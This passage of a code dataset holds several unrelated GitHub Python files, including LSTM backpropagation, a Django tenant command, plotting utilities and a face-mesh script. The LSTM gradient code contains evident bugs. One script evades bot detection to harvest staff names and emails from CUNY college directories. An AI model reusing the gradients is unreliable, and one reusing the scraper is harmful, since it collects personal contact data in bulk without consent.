self.gate_activator.backward(fg))\n delta_i = (delta_k * og * (1 - tanh_c * tanh_c) * ct * self.gate_activator.backward(ig))\n delta_ct = (delta_k * og * (1 - tanh_c * tanh_c) * ig * self.output_activator.backward(ct))\n delta_h_prew = (\n np.dot(delta_o.transpose(), self.Woh) +\n np.dot(delta_i.transpose(), self.Wih) +\n np.dot(delta_f.transpose(), self.Wfh) +\n np.dot(delta_ct.transpose(), self.Wch)\n ).transpose()\n\n # 保存全部的delta值\n self.delta_h_list[k - 1] = delta_h_prew\n self.delta_f_list[k] = delta_f\n self.delta_i_list[k] = delta_i\n self.delta_o_list[k] = delta_k\n self.delta_ct_list[k] = delta_ct\n\n def calc_gradient(self, x):\n # 初始化遗忘门权重梯度\n self.Wfh_grad, self.Wfx_grad, self.bf_grad = (self.init_weight_gradient_mat())\n # 初始化输入门权重梯度矩阵和偏置项\n self.Wih_grad, self.Wix_grad, self.bi_grad = (self.init_weight_gradient_mat())\n # 初始化输出门权重矩阵和偏置项\n self.Woh_grad, self.Wox_grad, self.bo_grad = 
(self.init_weight_gradient_mat())\n # 初始化单元状态权重矩阵和偏置项\n self.Wch_grad, self.Wcx_grad, self.bc_grad = (self.init_weight_gradient_mat())\n\n # 计算对上一个输出h的权重梯度\n for t in range(self.times, 0, -1):\n # 计算各个时刻的梯度\n (Wfh_grad, bf_grad, Wih_grad, bi_grad, Woh_grad, bo_grad, Wch_grad, bc_grad) = (self.calc_gradient_t(t))\n # 实际梯度是各时刻梯度之和\n self.Wfh_grad += Wfh_grad\n self.bf_grad += bf_grad\n self.Wih_grad += Wfh_grad\n self.bi_grad += bi_grad\n self.Woh_grad += Woh_grad\n self.bo_grad += bo_grad\n self.Wch_grad += Wch_grad\n self.bc_grad += bc_grad\n\n # 计算对本次输入x的权重梯度\n xt = x.transpose()\n self.Wfx_grad = np.dot(self.delta_f_list[-1], xt)\n self.Wix_grad = np.dot(self.delta_i_list[-1], xt)\n self.Wox_grad = np.dot(self.delta_o_list[-1], xt)\n self.Wcx_grad = np.dot(self.delta_ct_list[-1], xt)\n\n def init_weight_gradient_mat(self):\n \"\"\"\n 初始化权重矩阵\n :return:\n \"\"\"\n Wh_grad = np.zeros((self.state_width, self.state_width))\n Wx_grad = np.zeros((self.state_width, self.input_width))\n b_grad = np.zeros((self.state_width, 1))\n return Wh_grad, Wx_grad, b_grad\n\n def calc_gradient_t(self, t):\n \"\"\"\n 计算每个时刻t权重的梯度\n :param t:\n :return:\n \"\"\"\n h_prev = self.h_list[t - 1].transpose()\n Wfh_grad = np.dot(self.delta_f_list[t], h_prev)\n bf_grad = self.delta_f_list[t]\n Wih_grad = np.dot(self.delta_i_list[t], h_prev)\n bi_grad = self.delta_f_list[t]\n Woh_grad = np.dot(self.delta_o_list[t], h_prev)\n bo_grad = self.delta_f_list[t]\n Wch_grad = np.dot(self.delta_ct_list[t], h_prev)\n bc_grad = self.delta_ct_list[t]\n return Wfh_grad, bf_grad, Wih_grad, bi_grad, Woh_grad, bo_grad, Wch_grad, bc_grad\n\n def reset_state(self):\n # 计算当前时刻初始化为t0\n self.times = 0\n # 各个时刻的单元状态向量c\n self.c_list = self.init_state_vec()\n # 各个时刻的输出向量h\n self.h_list = self.init_state_vec()\n # 各个时刻的遗忘门f\n self.f_list = self.init_state_vec()\n # 各个时刻的输入门i\n self.i_list = self.init_state_vec()\n # 各个时刻的输出门o\n self.o_list = self.init_state_vec()\n # 各个时刻的即时状态\n self.ct_list = 
self.init_state_vec()\n\n\ndef data_set():\n x = [\n np.array([[1], [2], [3]]),\n np.array([[2], [3], [4]])\n ]\n d = np.array([[1], [2]])\n return x, d\n\n\ndef gradient_check():\n \"\"\"\n 梯度检查\n :return:\n \"\"\"\n error_function = lambda o: o.sum()\n\n lstm = LstmLayer(3, 2, 1e-3)\n\n # 计算forward值\n x, d = data_set()\n lstm.forward(x[0])\n lstm.forward(x[1])\n\n # 求取sensitivity map\n sensitivity_array = np.ones(lstm.h_list[-1].shape, dtype=np.float64)\n\n # 计算梯度\n lstm.backward(x[1], sensitivity_array, IdentityActivator())\n\n # 检查梯度\n epsilon = 10e-4\n for i in range(lstm.Wfh.shape[0]):\n for j in range(lstm.Wfh.shape[1]):\n lstm.Wfh[i, j] += epsilon\n lstm.reset_state()\n lstm.forward(x[0])\n lstm.forward(x[1])\n err1 = error_function(lstm.h_list[-1])\n lstm.Wfh[i, j] -= 2 * epsilon\n lstm.reset_state()\n lstm.forward(x[0])\n lstm.forward(x[1])\n err2 = error_function(lstm.h_list[-1])\n expect_grad = (err1 - err2) / (2 * epsilon)\n lstm.Wfh[i, j] += epsilon\n print('weights(%d, %d):expected - actural %.4e - %.4e' % (i, j, expect_grad, lstm.Wfh_grad[i, j]))\n return lstm\n\n\ndef test():\n l = LstmLayer(3, 2, 1e-3)\n x, d = data_set()\n l.forward(x[0])\n l.forward(x[1])\n l.backward(x[1], d, IdentityActivator())\n gradient_check()\n return l\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"OX915/NewFishLearning","sub_path":"FoundamentalsOfDeepLearning/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":11510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71627347332","text":"from django.core.management.base import BaseCommand\n\nfrom organization.services.organization_service import OrganizationService\nfrom tenant.services.tenant_service import TenantService\n\n\nclass Command(BaseCommand):\n help = \"Tenant Manager\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"-c\",\n \"--create\",\n action=\"store_true\",\n help=\"Create a tenant\",\n )\n 
parser.add_argument(\n \"-d\",\n \"--delete\",\n action=\"store_true\",\n help=\"Delete a tenant.\",\n )\n parser.add_argument(\n \"-ud\",\n \"--undelete\",\n action=\"store_true\",\n help=\"UnDelete a tenant.\",\n )\n\n parser.add_argument(\n \"--tenant_id\",\n help=\"Specify a tenant id.\",\n )\n parser.add_argument(\n \"--organization_name\",\n help=\"Specify a organization name.\",\n )\n parser.add_argument(\n \"--subdomain\",\n help=\"Specify a subdomain.\",\n )\n parser.add_argument(\n \"--email\",\n help=\"Specify an email.\",\n )\n parser.add_argument(\n \"--password\",\n help=\"Specify a password.\",\n )\n\n def handle(self, *args, **options):\n if options.get(\"c\") or options.get(\"create\"):\n if (\n options.get(\"subdomain\")\n and options.get(\"organization_name\")\n and options.get(\"email\")\n and options.get(\"password\")\n ):\n subdomain = options.get(\"subdomain\")\n organization_name = options.get(\"organization_name\")\n email = options.get(\"email\")\n password = options.get(\"password\")\n\n tenant_service = TenantService()\n result, tenant = tenant_service.create_tenant(\n subdomain=subdomain,\n email=email,\n )\n\n if result:\n organization_service = OrganizationService()\n result = organization_service.initiate_schema(\n schema_name=tenant.schema_name,\n organization_name=organization_name,\n email=email,\n password=password,\n )\n\n if result:\n self.stdout.write(\n self.style.SUCCESS(\"Successfully create a tenant!\")\n )\n else:\n self.stdout.write(self.style.SUCCESS(\"Can not create a tenant!\"))\n else:\n self.stdout.write(\n self.style.ERROR(\"Please provide the correct option.\")\n )\n\n elif options.get(\"d\") or options.get(\"delete\"):\n if options.get(\"tenant_id\"):\n tenant_id = options.get(\"tenant_id\")\n\n tenant_service = TenantService()\n result = tenant_service.delete_tenant(\n tenant_id=tenant_id,\n )\n\n if result:\n self.stdout.write(\n self.style.SUCCESS(\"Successfully delete a tenant!\")\n )\n else:\n 
self.stdout.write(self.style.SUCCESS(\"Can not delete a tenant!\"))\n else:\n self.stdout.write(\n self.style.ERROR(\"Please provide the correct option.\")\n )\n\n elif options.get(\"ud\") or options.get(\"undelete\"):\n if options.get(\"tenant_id\"):\n tenant_id = options.get(\"tenant_id\")\n\n organization_service = TenantService()\n result = organization_service.undelete_tenant(\n tenant_id=tenant_id,\n )\n\n if result:\n self.stdout.write(\n self.style.SUCCESS(\"Successfully undelete a tenant!\")\n )\n else:\n self.stdout.write(self.style.SUCCESS(\"Can not undelete a tenant!\"))\n else:\n self.stdout.write(\n self.style.ERROR(\"Please provide the correct option.\")\n )\n\n else:\n self.stdout.write(self.style.ERROR(\"Please provide the correct option.\"))\n","repo_name":"walkerchiu/django-docker-saas-starter","sub_path":"app/tenant/management/commands/tenant_manager.py","file_name":"tenant_manager.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1290593187","text":"'''\nCreated on 21. 7. 
2023\n\n@author: valic\n'''\nfrom itertools import combinations\n\nif __name__ == '__main__':\n a = input().split()\n s = a[0]\n n = int(a[1])\n \n s = ''.join(sorted(s))\n combins = []\n for i in range(1, n+1) :\n combins.append(list(combinations(s,i)))\n \n results = []\n for tpls in combins:\n for t in tpls:\n results.append(t)\n for r in results: \n print( ''.join(r), end = '\\n')\n","repo_name":"valiclud/python-projects","sub_path":"Hackerrank/main/intertools-combination.py","file_name":"intertools-combination.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71411902854","text":"# Simple Python 3 script to plot waveform profile[0] from the specified EEPROM dump.\n\n# Usage: python ir-remote-eeprom-map.py [bin-file]\n# Example: python ir-remote-eeprom-map.py test.bin\n\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport sys\n\nfilename = \"\"\ndata_unit_len = 10\n\nif len(sys.argv) < 2:\n\tprint(\"Usage: ir-remote-eeprom-map.py [BIN-FILE]\")\n\texit()\nelse:\n\tfilename = sys.argv[1]\n\nwith open(filename, \"rb\") as binfile:\n\trec_size = ord(binfile.read(1))\n\t\n\tprint(\"Number of records: \" + str(rec_size))\n\t\n\ttime_data = []\n\tfilepos = 0\n\t\n\t# Read 16-bit data set of the first waveform.\n\twhile(filepos < rec_size):\n\t\ttemp_data = ord(binfile.read(1)) << 8\n\t\ttemp_data = temp_data | ord(binfile.read(1)) \n\t\t\n\t\tfilepos = filepos + 1\n\t\tprint(hex(temp_data), end =\" \")\n\t\t\n\t\ttime_data.append(temp_data)\n\t\t\n\tprint(\"\")\n\tprint(\"File reading is completed\")\n\t\nif len(time_data) > 0 :\n\tplot_data = [0]\n\tis_zero = 0\n\t\n\trecpos = 0\n\twhile(recpos < len(time_data)):\n\t\tcurr_data = time_data[recpos]\n\t\t\n\t\t# Generating square waveform.\n\t\twhile(curr_data > 0):\n\t\t\tplot_data.append(is_zero)\n\t\t\tcurr_data = curr_data - data_unit_len\n\t\t\t\n\t\trecpos = recpos + 1\n\n\t\t# Determine the next 
logic level.\n\t\tif is_zero == 0:\n\t\t\tis_zero = 1\n\t\telse:\n\t\t\tis_zero = 0\n\t\t\t\nxs = np.repeat(range(len(plot_data)), 2)\nys = np.repeat(plot_data, 2)\nxs = xs[1:]\nys = ys[:-1]\n\nplot.plot(xs, ys)\nplot.ylim(-0.5, 1.5)\nplot.show()","repo_name":"dilshan/ir-clone","sub_path":"python-test/ir-remote-eeprom-map.py","file_name":"ir-remote-eeprom-map.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"44"} +{"seq_id":"2696303706","text":"from __future__ import print_function, division\nimport os\nimport argparse\nimport sys\nimport torch\nimport pretrainedmodels\nimport pretrainedmodels.utils\nimport pretrainedmodels.datasets as datasets\nimport h5py\n\nmodel_names = sorted(name for name in pretrainedmodels.__dict__\n if not name.startswith(\"__\")\n and name.islower()\n and callable(pretrainedmodels.__dict__[name]))\nparser = argparse.ArgumentParser(\n description='ImageNet Feature Extraction',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--dir_outputs', default='./outputs.h5', type=str, help='')\nparser.add_argument('--dir_datasets', default='/tmp/datasets', type=str, help='')\nparser.add_argument('-b', '--batch_size', default=30, type=float, help='')\nparser.add_argument('-a', '--arch', default='alexnet', choices=model_names,\n help='model architecture: ' +\n ' | '.join(model_names) +\n ' (default: alexnet)')\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--cuda', const=True, nargs='?', type=bool, help='')\nargs = parser.parse_args()\ndef main():\n pass\n\nif __name__ == '__main__':\n\n model = pretrainedmodels.__dict__[args.arch]()\n features_size = model.last_linear.in_features\n model.last_linear = pretrainedmodels.utils.Identity() \n scale = 0.875\n val_tf = pretrainedmodels.utils.TransformImage(\n model,\n scale=scale,\n 
preserve_aspect_ratio=True\n )\n dataset = datasets.ExtractionDatasetFolder(args.dir_datasets,\n val_tf)\n total = len(dataset)\n val_loader = torch.utils.data.DataLoader(\n dataset,\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True)\n if os.path.exists(args.dir_outputs):\n raise RuntimeError('{} file exits'.format(args.dir_outputs))\n df = h5py.File(args.dir_outputs,'w')\n dst = df.create_dataset(\"features\",(total, features_size),dtype='float32')\n with torch.no_grad():\n for ind, (img, label) in enumerate(val_loader):\n out = model(img)\n dst[ind*args.batch_size:(ind+1)*args.batch_size, :] = out\n print('{}/{}'.format(min((ind+1)*args.batch_size,total), total))\n\n df.close()\n","repo_name":"shykoe/ImageClassification","sub_path":"feature_extract.py","file_name":"feature_extract.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5219397369","text":"from promogest import Environment\nfrom promogest.lib.utils import *\nfrom promogest.ui.gtk_compat import *\nfrom promogest.modules.PromoWear.ui.PromowearUtils import *\n\ndef hidePromoWear(ui):\n \"\"\" Hide and destroy labels and button if promowear is not present\n \"\"\"\n ui.promowear_manager_taglia_colore_togglebutton.destroy()\n ui.promowear_manager_taglia_colore_image.hide()\n ui.anno_label.destroy()\n ui.label_anno.destroy()\n ui.stagione_label.destroy()\n ui.label15.destroy()\n ui.colore_label.destroy()\n ui.label14.destroy()\n ui.taglia_label.destroy()\n ui.label_taglia.destroy()\n ui.gruppo_taglia_label.destroy()\n ui.label_gruppo_taglia.destroy()\n ui.tipo_label.destroy()\n ui.label_tipo.destroy()\n\n\ndef setLabelInfo(ui):\n \"\"\" Setta a stringa vuota le info specifiche dell'articolo promowear\n \"\"\"\n ui.gruppo_taglia_label.set_markup('%s' % ('',))\n ui.taglia_label.set_markup('%s' % ('',))\n ui.colore_label.set_markup('%s' % ('',))\n 
ui.stagione_label.set_markup('%s' % ('',))\n ui.anno_label.set_markup('%s' % ('',))\n ui.tipo_label.set_markup('%s' % ('',))\n\ndef fillLabelInfo(ui, articolo):\n ui.gruppo_taglia_label.set_markup('%s' % (articolo['gruppoTaglia']))\n ui.taglia_label.set_markup('%s' % (articolo['taglia']))\n ui.colore_label.set_markup('%s' % (articolo['colore']))\n ui.stagione_label.set_markup('%s' % (articolo['stagione']))\n ui.anno_label.set_markup('%s' % (articolo['anno']))\n ui.tipo_label.set_markup('%s' % (\"\"))\n\ndef azzeraRiga(anaedit, numero):\n anaedit._righe[numero].update(idGruppoTaglia = None,\n gruppoTaglia = '',\n idTaglia = None,\n taglia = '',\n idColore = None,\n colore = '',\n idAnno = None,\n anno = '',\n idStagione = None,\n stagione = '',\n idGenere = None,\n genere = '')\n","repo_name":"francescomeloni/promogest","sub_path":"core/promogest/modules/PromoWear/ui/AnagraficaDocumentiEditPromoWearExt.py","file_name":"AnagraficaDocumentiEditPromoWearExt.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"74141507971","text":"import undetected_chromedriver as webdriver\n# from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom utils import _wait_for_element\nfrom loguru import logger\nfrom bs4 import BeautifulSoup\nimport threading\nimport string\nimport csv\nimport http.client\nimport json\n\n\ndef LaGuardia_spider_task(letter):\n options = webdriver.ChromeOptions()\n # options.add_argument(\"--headless\")\n driver = webdriver.Chrome(options=options)\n driver.get('https://apps.laguardia.edu/directory/')\n if _wait_for_element(driver, 'txtFirstName', 'id', 10):\n first_name_input = driver.find_element(By.ID, 'txtFirstName')\n first_name_input.send_keys(letter)\n confirm_button = driver.find_element(By.NAME, 'txtSearch')\n driver.execute_script(\"arguments[0].click();\", confirm_button)\n if _wait_for_element(driver, 'outputDataGrid', 
'id', 10):\n table_element = driver.find_element(By.ID, 'outputDataGrid')\n teacher_data = []\n soup = BeautifulSoup(table_element.get_attribute('innerHTML'), 'html.parser')\n\n # Iterate through each row in the table\n for row in soup.find_all('tr')[1:]: # Skip the header row (index 0)\n columns = row.find_all('td')\n\n # Extract the desired information (First Name, Last Name, and Email)\n first_name = columns[0].text.strip()\n last_name = columns[1].text.strip()\n email = columns[6].text.strip()\n\n # Append the data as a tuple to the teacher_data list\n teacher_data.append((first_name, last_name, email))\n\n # Write the data to a CSV file\n with open('teacher.csv', 'a', newline='') as csvfile:\n csv_writer = csv.writer(csvfile)\n csv_writer.writerow(['First Name', 'Last Name', 'Email']) # Write header row\n csv_writer.writerows(teacher_data) # Write the extracted data rows\n driver.close()\n\n\ndef BMCC_spider_tast(letter):\n options = webdriver.ChromeOptions()\n driver = webdriver.Chrome(options=options)\n driver.get('https://www.bmcc.cuny.edu/directory/')\n if _wait_for_element(driver, 'first-name', 'id', 10):\n first_name_input = driver.find_element(By.ID, 'first-name')\n first_name_input.send_keys(letter)\n confirm_button = driver.find_element(By.XPATH, '//button[text()=\"Search\"]')\n driver.execute_script(\"arguments[0].click();\", confirm_button)\n if _wait_for_element(driver, 'entry-content', 'class', 10):\n table_element = driver.find_element(By.CLASS_NAME, 'entry-content')\n teacher_data = []\n soup = BeautifulSoup(table_element.get_attribute('innerHTML'), 'html.parser')\n\n person_entries = soup.find_all('div', class_='dir-person-list-entry')\n\n # Iterate through each person entry and extract the desired information\n for person in person_entries:\n try:\n name_element = person.find('div', class_='dir-person-name')\n first_name, last_name = name_element.h3.text.strip().split(maxsplit=1)\n\n email_element = person.find('div', 
class_='dir-person-email')\n email = email_element.find('span', class_='dir-field-title').find_next_sibling('span').text.strip()\n\n teacher_data.append([first_name, last_name, email])\n except Exception as e:\n continue\n\n # Write the data to a CSV file\n output_file = \"teacher.csv\"\n with open(output_file, 'a', newline='') as csvfile:\n csv_writer = csv.writer(csvfile)\n csv_writer.writerows(teacher_data) # Write the extracted data rows\n\n driver.close()\n\n\ndef Bronx_spider(letter):\n conn = http.client.HTTPSConnection(\"ra.bcc.cuny.edu\")\n payload = '{{\"fname\": \"John\", \"lname\": \"Doe\", \"deptID\": \"\", \"ch\": \"{}\", \"func\": \"\", \"phExt\": \"\"}}'.format(letter)\n headers = {\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.188',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Host': 'ra.bcc.cuny.edu',\n 'Connection': 'keep-alive'\n }\n conn.request(\"POST\", \"/BCCAPI/Service.asmx/GetBCCEmplDirectorySearch\", payload, headers)\n res = conn.getresponse()\n data = res.read()\n res_str = data.decode(\"utf-8\")\n\n # 解析 JSON 响应\n json_data = json.loads(res_str)\n\n # 提取字段并保存到CSV文件\n with open('teacher.csv', 'a', newline='') as csvfile:\n fieldnames = ['First Name', 'Last Name', 'Email']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n for employee in json_data['d']:\n full_name = employee['EMPL_NAME']\n first_name, last_name = full_name.split(', ', 1)\n email = employee['EMPL_EMAIL']\n\n writer.writerow({'First Name': first_name, 'Last Name': last_name, 'Email': email})\n\n\ndef Stella_spider_task():\n options = webdriver.ChromeOptions()\n driver = webdriver.Chrome(options=options)\n driver.get('https://guttman.cuny.edu/about/directory/#offices')\n if _wait_for_element(driver, 
\"vc_tta-panel-body\", \"class\", 10):\n table_element = driver.find_element(By.CLASS_NAME, 'vc_tta-panel-body')\n soup = BeautifulSoup(table_element.get_attribute('innerHTML'), 'html.parser')\n with open('teacher.csv', 'w', newline='') as csvfile:\n fieldnames = ['First Name', 'Last Name', 'Email']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n # 查找所有的h3标签,这里假设所有的h3标签都包含了名字信息\n h3_tags = soup.find_all('h3')\n\n for h3_tag in h3_tags:\n try:\n # 获取名字信息\n full_name = h3_tag.get_text()\n first_name, last_name = full_name.split(' ', 1)\n\n # 获取邮箱信息\n email_tag = h3_tag.find_next('a')\n email = email_tag['href'].split(':')[1]\n\n # 写入CSV文件\n writer.writerow({'First Name': first_name, 'Last Name': last_name, 'Email': email})\n except Exception as e:\n continue\n driver.get('https://guttman.cuny.edu/about/directory/#fsa')\n if _wait_for_element(driver, \"GuttmanDirectory_wrapper\", \"id\", 10):\n table_element = driver.find_element(By.XPATH, \"//tbody\")\n soup = BeautifulSoup(table_element.get_attribute('innerHTML'), 'html.parser')\n # 提取字段并保存到CSV文件\n with open('teacher.csv', 'a', newline='') as csvfile:\n fieldnames = ['First Name', 'Last Name', 'Email']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n # 查找所有的tr标签\n rows = soup.find_all('tr')\n for row in rows:\n # 查找h2标签,并获取名字\n name_tag = row.find('h2')\n full_name = name_tag.get_text()\n first_name, last_name = full_name.split(' ', 1)\n # 查找a标签,并获取邮箱\n email_tag = row.find('a')\n email = email_tag['href'].split(':')[1]\n # 写入CSV文件\n writer.writerow({'First Name': first_name, 'Last Name': last_name, 'Email': email})\n\n\ndef Kingsborough_spider():\n html_data = \"\"\"请输入html\"\"\"\n\n # 解析HTML数据\n soup = BeautifulSoup(html_data, \"html.parser\")\n\n # 提取字段并保存到CSV文件\n with open('teacher.csv', 'a', newline='') as csvfile:\n fieldnames = ['First Name', 'Last Name', 'Email']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n 
writer.writeheader()\n\n # 查找所有的标签中的标签,这里假设每个标签都包含了一个人的信息\n rows = soup.select('tbody tr')\n\n for row in rows:\n # 获取姓名信息\n name_cell = row.select_one('td:nth-of-type(1)')\n full_name = name_cell.get_text()\n first_name, last_name = full_name.split(' ', 1)\n\n # 获取邮箱信息\n email_cell = row.select_one('td:nth-of-type(2)')\n email = email_cell.get_text()\n\n # 写入CSV文件\n writer.writerow({'First Name': first_name, 'Last Name': last_name, 'Email': email})\n\n\nif __name__ == '__main__':\n thread_arr = []\n uppercase_letters = string.ascii_uppercase\n # Stella_spider_task()\n Kingsborough_spider()\n # for letter in uppercase_letters:\n # LaGuardia_spider_task(letter)\n # BMCC_spider_tast(letter)\n # Bronx_spider(letter)\n","repo_name":"Wchvan/spider","sub_path":"laguardia_spider.py","file_name":"laguardia_spider.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11808891220","text":"import click\n\nfrom menus.manipulatemenu import manipulate_menu\nfrom seekers.complexSeeker.all import *\n\ndef complexSeeker_menu(symbol_selector,symbols):\n\n\n print('\\033[34m' + \"Available relation seekers:\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[1] \" + '\\033[0m' + '\\033[34m' + \"[Seek for an IP field]\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[2] \" + '\\033[0m' + '\\033[34m' + \"[Seek for CRC32 relation]\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[3] \" + '\\033[0m' + '\\033[34m' + \"[Separate header fields and data fields]\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[4] \" + '\\033[0m' + '\\033[34m' + \"[Seek a size relation between two fields]\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[B] \" + '\\033[0m' + '\\033[34m' + \"[Go back to previous menu]\" + '\\033[0m' + '\\n')\n\n seeker_selector = input(\" PLEASE SELECT A CHOICE >>> \")\n complexSeeker_menu_choice(seeker_selector, symbols, symbol_selector)\n\ndef 
complexSeeker_menu_choice(seeker_selector,symbols,symbol_selector):\n\n if (seeker_selector == \"1\"):\n click.echo(click.style(\"SEARCH FOR IPS\\n\", fg=\"yellow\"))\n metaseeker_menu(symbol_selector, symbols)\n elif (seeker_selector == \"2\"):\n click.echo(click.style(\"SEARCH FOR CRC32\\n\", fg=\"yellow\"))\n crcSeeker_menu(symbol_selector, symbols)\n elif (seeker_selector == \"3\"):\n click.echo(click.style(\"SEARCH FOR HEADER AND DATA FIELDS\\n\", fg=\"yellow\"))\n headerSeeker_menu(symbols)\n elif (seeker_selector == \"4\"):\n click.echo(click.style(\"SEARCH FOR SIZE\\n\", fg=\"yellow\"))\n sizeSeeker_menu(symbol_selector,symbols)\n elif (seeker_selector == \"B\"):\n click.echo(click.style(\"BACK TO PREVIOUS MENU\\n\", fg=\"yellow\"))\n manipulate_menu(symbols)\n else:\n click.echo(click.style(\"ERROR : WRONG SELECTION\\n\", fg=\"yellow\"))\n complexSeeker_menu(symbol_selector,symbols)","repo_name":"conix-security/TAPIRE","sub_path":"menus/complexSeekersmenu.py","file_name":"complexSeekersmenu.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"2801033475","text":"from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\n\nfrom PyQt5.QtWidgets import QSizePolicy\n\n\nclass Graph(FigureCanvas):\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(111)\n\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QSizePolicy.Expanding,\n QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n plt.ion()\n\n self.max_number = 100\n self.numbers = []\n self.plot()\n\n def plot(self):\n self.ax = self.figure.add_subplot(111)\n self.ax.yaxis.set_major_locator(MaxNLocator(nbins=1, integer=True))\n 
self.figure.canvas.draw()\n\n\nclass DotGraph(Graph):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.line = {}\n\n def addvalue(self, value=None):\n if value is not None:\n self.numbers.append(value)\n if value not in self.line:\n self.line[value] = 0\n self.line[value] += 1\n freq = [self.line[i] for i in self.numbers]\n self.ax.plot(self.numbers, freq, \".\")\n self.figure.canvas.draw()\n\n\nclass LineGraph(Graph):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.line = [0 for i in range(1, self.max_number + 1)]\n\n def addvalue(self, value=None):\n if value is not None:\n if value == 0:\n value = 100\n self.line[value-1] += 1\n self.numbers.append(value)\n self.ax.clear()\n self.ax.plot(self.line)\n self.figure.canvas.draw()\n","repo_name":"Minorias/pds_lavalamp","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"18319511755","text":"import MySQLdb\nimport peewee\n\n\ndef dictfetchall(cursor):\n \"\"\"Return all rows from a cursor as a dict\"\"\"\n columns = [col[0] for col in cursor.description]\n return [\n dict(zip(columns, row))\n for row in cursor.fetchall()\n ]\n\n\ndb = MySQLdb.connect(host='localhost', user='dbuser', db='imdb', connect_timeout=5, charset='utf8')\ncursor = db.cursor() # represent a database cursor, which is used to manage the context of fetch operation\ncursor.execute(\"SELECT VERSION()\")\ndata = cursor.fetchone()\nprint(\"Database version: \", data)\ncursor.execute('SELECT * FROM Reviewer')\nprint(dictfetchall(cursor))\ncursor.close()\ndb.close()\n\n\ndef query(self, sql):\n try:\n self.conn.ping()\n except:\n self.connect()\n with closing(self.conn.cursor()) as cursor:\n cursor.execute(sql)\n return 
self.dictfetchall(cursor)","repo_name":"adwiza/py-adv","sub_path":"less-10-authomatization.py","file_name":"less-10-authomatization.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73282558532","text":"import numpy as np\nimport cv2\nimport mediapipe as mp\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_face_mesh = mp.solutions.face_mesh\n\nleft_eye = [i[1] for i in mp.solutions.face_mesh.FACEMESH_LEFT_EYE]\nright_eye = [i[0] for i in mp.solutions.face_mesh.FACEMESH_RIGHT_EYE]\n\ndef draw(image, results):\n annotated_image = image.copy()\n for face_landmarks in results.multi_face_landmarks:\n #print('face_landmarks:', face_landmarks)\n mp_drawing.draw_landmarks(\n image=annotated_image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_TESSELATION,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_tesselation_style())\n mp_drawing.draw_landmarks(\n image=annotated_image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_CONTOURS,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_contours_style())\n mp_drawing.draw_landmarks(\n image=annotated_image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_IRISES,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_iris_connections_style())\n return annotated_image\n\n\ndef compute_w_ratio(results):\n p_lefteye, p_righteye, p_left, p_right = get_points(results)\n return np.linalg.norm(p_lefteye - 